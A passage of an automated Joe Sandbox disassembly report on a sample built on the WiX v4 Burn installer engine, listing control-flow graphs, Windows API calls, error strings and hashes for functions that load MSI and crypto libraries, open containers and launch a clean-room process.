                                                                                                                                                                                                                                                                            • Failed to load Msi.DLL, xrefs: 0093F5C9
                                                                                                                                                                                                                                                                            • MsiDetermineApplicablePatchesW, xrefs: 0093F620
                                                                                                                                                                                                                                                                            • MsiBeginTransactionW, xrefs: 0093F701
                                                                                                                                                                                                                                                                            • Msi.dll, xrefs: 0093F5B9
                                                                                                                                                                                                                                                                            • MsiGetProductInfoExW, xrefs: 0093F68C
                                                                                                                                                                                                                                                                            • MsiDeterminePatchSequenceW, xrefs: 0093F5FC
                                                                                                                                                                                                                                                                            • MsiEndTransaction, xrefs: 0093F720
                                                                                                                                                                                                                                                                            • MsiSetExternalUIRecord, xrefs: 0093F6B0
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\wiutil.cpp, xrefs: 0093F5D8
                                                                                                                                                                                                                                                                            • MsiEnumProductsExW, xrefs: 0093F644
                                                                                                                                                                                                                                                                            • MsiGetPatchInfoExW, xrefs: 0093F668
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressProc
                                                                                                                                                                                                                                                                            • String ID: Failed to load Msi.DLL$Msi.dll$MsiBeginTransactionW$MsiDetermineApplicablePatchesW$MsiDeterminePatchSequenceW$MsiEndTransaction$MsiEnumProductsExW$MsiGetPatchInfoExW$MsiGetProductInfoExW$MsiSetExternalUIRecord$MsiSourceListAddSourceExW$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\wiutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 190572456-4147843358
                                                                                                                                                                                                                                                                            • Opcode ID: 6f0e6d828f6af0636e6623d16e2eb252e77f7b4a0c9afaefe45f295b09e9a612
                                                                                                                                                                                                                                                                            • Instruction ID: f50bc6f108ddd1478a8b69a1f37876d78b82a8b88641c0c6ae846dd93b59bebe
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6f0e6d828f6af0636e6623d16e2eb252e77f7b4a0c9afaefe45f295b09e9a612
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A41A1BA96B204AFEB11AF20ED1BB153AB5FF61749F104129E00DA91B0E3B119C0FF44
                                                                                                                                                                                                                                                                            Function 008E83D7 Relevance: 33.6, APIs: 2, Strings: 20, Instructions: 593COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 866 8e83d7-8e841e EnterCriticalSection call 8e2680 869 8e8444-8e8459 call 8e29c8 866->869 870 8e8420-8e842d 866->870 876 8e866e-8e867c call 927b40 869->876 877 8e845f-8e8471 869->877 872 8e8432-8e843f call 8e1228 870->872 878 8e8a0e-8e8a1c LeaveCriticalSection 872->878 883 8e8682-8e869f call 8eb957 876->883 884 8e8473-8e8487 call 927b40 876->884 877->872 880 8e8a1e-8e8a24 878->880 881 8e8a57-8e8a5c 878->881 887 8e8a26 880->887 888 8e8a51-8e8a52 call 8e55c9 880->888 885 8e8a5e-8e8a5f call 94c1db 881->885 886 8e8a64-8e8a68 881->886 904 8e86a5-8e86b7 883->904 905 8e87f1-8e87f5 call 94c1fc 883->905 906 8e848d-8e8497 884->906 907 8e87bb-8e87d8 call 8eb957 884->907 885->886 893 8e8a6a-8e8a6e 886->893 894 8e8a88-8e8a9b call 8e3886 * 3 886->894 895 8e8a28-8e8a2c 887->895 888->881 899 8e8a78-8e8a7c 893->899 900 8e8a70-8e8a73 call 8e367f 893->900 912 8e8aa0-8e8aa6 894->912 901 8e8a3e-8e8a41 call 8e3886 895->901 902 8e8a2e-8e8a32 895->902 911 8e8a7e-8e8a86 call 8e367f 899->911 899->912 900->899 909 8e8a46-8e8a49 901->909 902->909 910 8e8a34-8e8a3c call 8e367f 902->910 924 8e87fa-8e87ff 905->924 916 8e8499-8e84bb call 8eb957 906->916 917 8e84e5-8e84e7 906->917 907->905 936 8e87da-8e87e7 907->936 909->895 914 8e8a4b-8e8a4e 909->914 910->909 911->912 914->888 941 8e8668-8e866b 916->941 942 8e84c1-8e84e0 call 8e1228 916->942 922 8e84e9-8e850a call 8eb957 917->922 923 8e8513-8e8534 call 8eb99a 917->923 943 8e86bc-8e86c9 922->943 944 8e8510 922->944 947 8e853a-8e854c 923->947 948 8e87a4-8e87b1 923->948 931 8e8833-8e8840 call 94c20c 924->931 932 8e8801-8e8829 call 8e1225 924->932 950 8e8885-8e888c 931->950 951 8e8842 931->951 932->931 936->905 941->876 962 8e8a0b 942->962 957 8e86d3-8e86fb call 8e1225 943->957 944->923 952 8e854e-8e8556 call 8e56c2 947->952 953 8e8563-8e856f call 8e540b 947->953 948->907 955 8e888e-8e8897 950->955 956 8e88b2-8e88cd call 94c21c 950->956 958 8e8848-8e884b 951->958 959 8e8844-8e8846 951->959 952->957 973 8e855c-8e8561 952->973 976 8e8575-8e8579 953->976 977 8e8772-8e879f call 8e1225 953->977 963 8e88ac-8e88b0 955->963 964 8e8899-8e88a8 call 94c20c 955->964 983 8e88cf-8e88d1 956->983 984 8e8947-8e894b 956->984 982 8e8700 957->982 967 8e8851-8e8856 958->967 959->967 962->878 963->955 963->956 989 8e88aa 964->989 990 8e88d9 964->990 974 8e8858-8e885d 967->974 975 8e8860-8e8872 call 8e1225 967->975 973->976 974->975 997 8e8877-8e887f 975->997 978 8e857b-8e8582 976->978 979 8e85a1-8e85b7 call 8eb4f2 976->979 977->982 978->979 986 8e8584-8e859f call 8eb99a 978->986 1008 8e85bd-8e85c5 979->1008 1009 8e874b-8e876d call 8e1228 979->1009 1001 8e8706-8e8713 982->1001 983->984 991 8e88d3 983->991 992 8e89ff-8e8a04 984->992 993 8e8951-8e896a call 8eb938 984->993 1016 8e861f-8e8621 986->1016 989->963 995 8e88df-8e88e2 990->995 996 8e88db-8e88dd 990->996 1002 8e88d5-8e88d7 991->1002 1003 8e8913-8e8916 991->1003 992->962 999 8e8a06-8e8a09 992->999 1011 8e896c-8e8979 993->1011 1012 8e8983-8e899a call 94c21c 993->1012 1006 8e88e8-8e88ed 995->1006 996->1006 997->950 999->962 1021 8e871d-8e872a 1001->1021 1010 8e891c-8e8921 1002->1010 1003->1010 1014 8e88ef-8e88f4 1006->1014 1015 8e88f7-8e890e call 8e1225 1006->1015 1017 8e85c9-8e85cd 1008->1017 1018 8e85c7 1008->1018 1009->962 1019 8e892b-8e8942 call 8e1225 1010->1019 1020 8e8923-8e8928 1010->1020 1011->1012 1037 8e899c 1012->1037 1038 8e89d2-8e89e6 call 8eb99a 1012->1038 1014->1015 1015->997 1025 8e8627-8e8645 call 8eb979 1016->1025 1026 8e8734-8e8741 1016->1026 1027 8e85cf-8e85d1 1017->1027 1028 8e85e9-8e8607 call 8e8b6f 1017->1028 1018->1017 1019->997 1020->1019 1021->1026 1025->1021 1045 8e864b-8e8662 call 8eb957 1025->1045 1026->1009 1027->1028 1033 8e85d3-8e85e7 call 8e2eaf 1027->1033 1041 8e861c 1028->1041 1042 8e8609-8e8612 call 8e3089 1028->1042 1053 8e8617-8e8619 1033->1053 1043 8e899e-8e89aa 1037->1043 1044 8e89ac 1037->1044 1038->992 1054 8e89e8-8e89f5 1038->1054 1041->1016 1042->1053 1043->1044 1050 8e89ae-8e89b3 1044->1050 1051 8e89b6-8e89c8 call 8e1225 1044->1051 1045->941 1045->1001 1050->1051 1051->1038 1053->1041 1054->992
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(00000000,00000000,00000000,?,?,008FA80F,?,?,00000001,00000000,00000008,?,00000000,00000000,?,?), ref: 008E83FF
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(00000000,00000000,?,0094E908,00000000,00000000,00000000,00000008,00000000,00000000,00000008,?,00000000,00000008,?,?), ref: 008E8A11
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                            • String ID: *****$Failed to allocate buffer for format string.$Failed to allocate record.$Failed to allocate string.$Failed to allocate variable array.$Failed to append placeholder.$Failed to append string.$Failed to copy string.$Failed to determine variable visibility: '%ls'.$Failed to format placeholder string.$Failed to format record.$Failed to get formatted length.$Failed to get variable name.$Failed to length of format string.$Failed to reallocate variable array.$Failed to set record format string.$Failed to set record string.$Failed to set variable value.$[%d]$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3168844106-2252141963
                                                                                                                                                                                                                                                                            • Opcode ID: 13a4a189e57749c01c67215e081044babb1ac906d21779d85284546ffefb7d32
                                                                                                                                                                                                                                                                            • Instruction ID: 135b371aca4426558c4792b62a42823cf730b2bce62d503e2b9452caad0dc479
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 13a4a189e57749c01c67215e081044babb1ac906d21779d85284546ffefb7d32
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3C12E971E41269FADB10DF968C45FBF7AA8FB46B55F110025FE04FB180DA709E009BA5
                                                                                                                                                                                                                                                                            Function 008E74EE Relevance: 31.7, APIs: 6, Strings: 12, Instructions: 208windowCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 1058 8e74ee-8e7544 call 8fa5be 1061 8e756a-8e7579 call 8e4456 1058->1061 1062 8e7546-8e7553 1058->1062 1067 8e758f-8e759d call 8fe49c 1061->1067 1068 8e757b-8e758d 1061->1068 1064 8e7558-8e7565 call 8e1228 1062->1064 1071 8e76b8-8e76c3 IsWindow 1064->1071 1077 8e759f-8e75a4 1067->1077 1078 8e75a6-8e75af call 8fe4a9 1067->1078 1068->1064 1072 8e76d4-8e76d8 1071->1072 1073 8e76c5-8e76ce PostMessageW 1071->1073 1075 8e76da-8e76e3 1072->1075 1076 8e76e7-8e76ed 1072->1076 1073->1072 1075->1076 1081 8e76ef-8e76f8 1076->1081 1082 8e76fb-8e76fe 1076->1082 1079 8e75d4-8e75ec call 90347d 1077->1079 1084 8e75b4-8e75b8 1078->1084 1096 8e75ee-8e75fb 1079->1096 1097 8e7612-8e762b call 8e2b11 1079->1097 1081->1082 1086 8e770c-8e770e 1082->1086 1087 8e7700-8e7709 1082->1087 1090 8e75ce-8e75d1 1084->1090 1091 8e75ba-8e75cc 1084->1091 1088 8e7717-8e772b call 8e3886 * 2 1086->1088 1089 8e7710 1086->1089 1087->1086 1110 8e772d-8e7730 call 8e367f 1088->1110 1111 8e7735-8e7739 1088->1111 1089->1088 1090->1079 1091->1064 1098 8e7600-8e760d call 8e1228 1096->1098 1105 8e762d-8e763f 1097->1105 1106 8e7641-8e765d call 9037dc 1097->1106 1108 8e76b5 1098->1108 1105->1098 1116 8e765f-8e7674 1106->1116 1117 8e7676-8e768a call 93bf20 1106->1117 1108->1071 1110->1111 1114 8e773b-8e773e call 8e367f 1111->1114 1115 8e7743-8e7749 1111->1115 1114->1115 1119 8e76a8-8e76b2 call 8e1228 1116->1119 1122 8e768f-8e7693 1117->1122 1119->1108 1122->1108 1124 8e7695-8e76a3 1122->1124 1124->1119
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • IsWindow.USER32(0094E7C0), ref: 008E76BB
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(0094E7C0,00000010,00000000,00000000), ref: 008E76CE
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 008E76DD
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(008E7EA1), ref: 008E76F2
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 008E7703
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 008E7711
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseHandle$MessagePostWindow
                                                                                                                                                                                                                                                                            • String ID: "%ls" %ls$Failed to allocate full command-line.$Failed to cache to clean room.$Failed to create clean room command-line.$Failed to get path for current process.$Failed to launch clean room process: %ls$Failed to open clean room log.$Failed to wait for clean room process: %ls$d:\a\wix4\wix4\src\burn\engine\engine.cpp$msasn1.dll$version.dll$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 2982985107-2647716674
                                                                                                                                                                                                                                                                            • Opcode ID: 3e76f8423af8ffaf1ed41bec4b2cbdbcee0d065c9944fef4d0fc441337a00635
                                                                                                                                                                                                                                                                            • Instruction ID: 3ada6e4f8807d0912a4e563a44ef7ccac8ff78156f7af642712b505eeb1463f2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3e76f8423af8ffaf1ed41bec4b2cbdbcee0d065c9944fef4d0fc441337a00635
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B61E371E4465ABBDB12DBA9CC46FEEBB78FB05714F100115FA10F61D0D7B099408BA5
                                                                                                                                                                                                                                                                            Function 008EEBDB Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 146fileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 1181 8eebdb-8eec0b 1182 8eec0d-8eec2b 1181->1182 1183 8eec80-8eec9e GetCurrentProcess * 2 DuplicateHandle 1181->1183 1184 8eecda-8eecdd 1182->1184 1193 8eec31-8eec3b GetLastError 1182->1193 1183->1184 1185 8eeca0-8eecaa GetLastError 1183->1185 1189 8eecdf-8eece5 1184->1189 1190 8eece7-8eece9 1184->1190 1186 8eecac-8eecb5 1185->1186 1187 8eecb7 1185->1187 1186->1187 1191 8eecbe-8eecd8 call 8e1225 1187->1191 1192 8eecb9 1187->1192 1194 8eeceb-8eecf9 SetFilePointerEx 1189->1194 1190->1194 1210 8eec69-8eec7b call 8e1228 1191->1210 1192->1191 1198 8eec3d-8eec46 1193->1198 1199 8eec48 1193->1199 1195 8eed3c-8eed42 1194->1195 1196 8eecfb-8eed05 GetLastError 1194->1196 1202 8eed44-8eed48 call 90ee8b 1195->1202 1203 8eed72-8eed78 1195->1203 1200 8eed07-8eed10 1196->1200 1201 8eed12 1196->1201 1198->1199 1205 8eec4f-8eec64 call 8e1225 1199->1205 1206 8eec4a 1199->1206 1200->1201 1207 8eed19-8eed3a call 8e1225 1201->1207 1208 8eed14 1201->1208 1215 8eed4d-8eed51 1202->1215 1205->1210 1206->1205 1219 8eed6a-8eed6f call 8e1228 1207->1219 1208->1207 1210->1203 1215->1203 1218 8eed53-8eed65 1215->1218 1218->1219 1219->1203
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,08000080,00000000,?,00000000,00000000,?,008EEE16,008E7D9B,?,?,008E7DDB), ref: 008EEC20
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,008EEE16,008E7D9B,?,?,008E7DDB,008E7DDB,00000000,?,00000000), ref: 008EEC31
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,?,00000000,00000000,?,008EEE16,008E7D9B,?,?,008E7DDB,008E7DDB,00000000,?), ref: 008EEC85
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(000000FF,00000000,?,008EEE16,008E7D9B,?,?,008E7DDB,008E7DDB,00000000,?,00000000), ref: 008EEC8F
                                                                                                                                                                                                                                                                            • DuplicateHandle.KERNELBASE(00000000,?,008EEE16,008E7D9B,?,?,008E7DDB,008E7DDB,00000000,?,00000000), ref: 008EEC96
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,008EEE16,008E7D9B,?,?,008E7DDB,008E7DDB,00000000,?,00000000), ref: 008EECA0
                                                                                                                                                                                                                                                                            • SetFilePointerEx.KERNELBASE(?,00000000,00000000,00000000,00000000,?,008EEE16,008E7D9B,?,?,008E7DDB,008E7DDB,00000000,?,00000000), ref: 008EECF1
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,008EEE16,008E7D9B,?,?,008E7DDB,008E7DDB,00000000,?,00000000), ref: 008EECFB
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLast$CurrentFileProcess$CreateDuplicateHandlePointer
                                                                                                                                                                                                                                                                            • String ID: @1Wu$Failed to duplicate handle to container: %ls$Failed to move file pointer to container offset.$Failed to open container.$Failed to open file: %ls$crypt32.dll$d:\a\wix4\wix4\src\burn\engine\container.cpp$feclient.dll
                                                                                                                                                                                                                                                                            • API String ID: 2619879409-1228101344
                                                                                                                                                                                                                                                                            • Opcode ID: 64bea18118d4ecb9dc17c69e14e3384e26b34502cd35f77d8b07347f8aff2486
                                                                                                                                                                                                                                                                            • Instruction ID: 1971290fd143130aaf2fd70cdbf9c33355092b6d2672e531414b84967a5ff1f7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 64bea18118d4ecb9dc17c69e14e3384e26b34502cd35f77d8b07347f8aff2486
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1341F376A40662BBD7218F1ACC49F6B7A68FF06B65F114215FE14EB280E3A1DC50D7E0
                                                                                                                                                                                                                                                                            Function 0093A58B Relevance: 28.1, APIs: 6, Strings: 10, Instructions: 99libraryloaderCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 1222 93a58b-93a5a0 call 8e1839 1225 93a5a2-93a5ce GetProcAddress * 2 1222->1225 1226 93a5d0 1222->1226 1227 93a5d5-93a5dc 1225->1227 1226->1227 1228 93a5e6-93a5f9 call 8e1839 1227->1228 1229 93a5de-93a5e0 1227->1229 1234 93a5fb-93a607 1228->1234 1235 93a619-93a636 GetProcAddress 1228->1235 1229->1228 1230 93a6d4 1229->1230 1233 93a6de-93a6e2 1230->1233 1236 93a60c-93a614 call 8e1228 1234->1236 1237 93a677-93a694 GetProcAddress 1235->1237 1238 93a638-93a63a 1235->1238 1236->1233 1237->1230 1239 93a696-93a698 1237->1239 1238->1237 1241 93a63c-93a646 GetLastError 1238->1241 1239->1230 1242 93a69a-93a6a4 GetLastError 1239->1242 1244 93a653 1241->1244 1245 93a648-93a651 1241->1245 1246 93a6b1 1242->1246 1247 93a6a6-93a6af 1242->1247 1248 93a655 1244->1248 1249 93a65a-93a672 call 8e1225 1244->1249 1245->1244 1250 93a6b3 1246->1250 1251 93a6b8-93a6d2 call 8e1225 1246->1251 1247->1246 1248->1249 1255 93a674-93a675 1249->1255 1250->1251 1251->1255 1255->1236
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 008E1839: LoadLibraryExW.KERNEL32(?,00000000,00000800,00000000,?,008E1645,?,?,?,?,?,?,008E115A,cabinet.dll,00000009,?), ref: 008E1855
                                                                                                                                                                                                                                                                              • Part of subcall function 008E1839: GetLastError.KERNEL32(?,008E1645,?,?,?,?,?,?,008E115A,cabinet.dll,00000009,?,?,00000000), ref: 008E1866
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNELBASE(SystemFunction040,AdvApi32.dll), ref: 0093A5AD
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(SystemFunction041), ref: 0093A5C3
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(CryptProtectMemory,Crypt32.dll), ref: 0093A624
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 0093A63C
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(CryptUnprotectMemory), ref: 0093A682
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 0093A69A
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressProc$ErrorLast$LibraryLoad
                                                                                                                                                                                                                                                                            • String ID: AdvApi32.dll$Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory$Failed to load Crypt32.dll$Failed to load a decryption method$Failed to load an encryption method$SystemFunction040$SystemFunction041$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\cryputil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1969025732-402918305
                                                                                                                                                                                                                                                                            • Opcode ID: b7ff12c65672c4048a8dfb5c9022f8538209c6bf73ef61a96aaaffcf1375b640
                                                                                                                                                                                                                                                                            • Instruction ID: f2eea32c2c25850ecfa9a7451424d8a20b0cf58de854e2957e569aacd6ce3db8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b7ff12c65672c4048a8dfb5c9022f8538209c6bf73ef61a96aaaffcf1375b640
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2831B537A96321A7D3315B199C0FF163968BB51B99F058111FA4CBA2F1E3B49C80EF91
                                                                                                                                                                                                                                                                            Function 008E3EC2 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 252sleepfiletimeCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 1257 8e3ec2-8e3f12 1258 8e3f4d-8e3f5b call 8e4dd8 1257->1258 1259 8e3f14-8e3f17 1257->1259 1264 8e3f6e-8e3f83 call 8e3dce 1258->1264 1265 8e3f5d-8e3f6c 1258->1265 1259->1258 1260 8e3f19-8e3f2a call 8e3dce 1259->1260 1269 8e3f2c-8e3f36 1260->1269 1270 8e3f96-8e3fa4 call 8e4601 1260->1270 1264->1270 1274 8e3f85-8e3f94 1264->1274 1267 8e3f3b-8e3f48 call 8e1228 1265->1267 1279 8e4130-8e4134 1267->1279 1269->1267 1277 8e3fd9-8e3fde 1270->1277 1278 8e3fa6-8e3faa call 8e6305 1270->1278 1274->1267 1280 8e3fe8 1277->1280 1281 8e3fe0-8e3fe5 1277->1281 1289 8e3faf-8e3fb3 1278->1289 1282 8e413e-8e4142 1279->1282 1283 8e4136-8e4139 call 8e367f 1279->1283 1285 8e3feb-8e4009 GetLocalTime 1280->1285 1281->1280 1287 8e414c-8e4150 1282->1287 1288 8e4144-8e4147 call 8e367f 1282->1288 1283->1282 1290 8e400b 1285->1290 1291 8e4010-8e4049 call 8e2acf 1285->1291 1293 8e415a-8e415e 1287->1293 1294 8e4152-8e4155 call 8e367f 1287->1294 1288->1287 1289->1277 1295 8e3fb5-8e3fd4 call 8e1228 1289->1295 1290->1291 1306 8e404f-8e4061 1291->1306 1307 8e4108-8e4112 1291->1307 1299 8e4168-8e4178 call 9267e6 1293->1299 1300 8e4160-8e4163 call 8e367f 1293->1300 1294->1293 1295->1279 1300->1299 1309 8e406a-8e406f 1306->1309 1308 8e4117-8e4121 call 8e1228 1307->1308 1314 8e4124-8e4127 1308->1314 1312 8e40d1-8e40d6 1309->1312 1313 8e4071-8e407c GetLastError 1309->1313 1315 8e40fa-8e40ff 1312->1315 1316 8e40d8-8e40e7 call 8e2eaf 1312->1316 1317 8e407e-8e4081 1313->1317 1318 8e4083-8e4091 Sleep 1313->1318 1314->1279 1319 8e4129 1314->1319 1315->1314 1321 8e4101-8e4106 1315->1321 1316->1315 1330 8e40e9-8e40f8 1316->1330 1317->1318 1322 8e409a 1317->1322 1323 8e409d-8e409f 1318->1323 1324 8e4093-8e4098 1318->1324 1319->1279 1321->1314 1322->1323 1325 8e40ac 1323->1325 1326 8e40a1-8e40aa 1323->1326 1324->1323 1328 8e40ae-8e40b0 1325->1328 1329 8e40ba-8e40c7 1325->1329 1326->1325 1328->1312 1331 8e40b2-8e40b5 1328->1331 1329->1312 1330->1308 1331->1285
                                                                                                                                                                                                                                                                            APIs
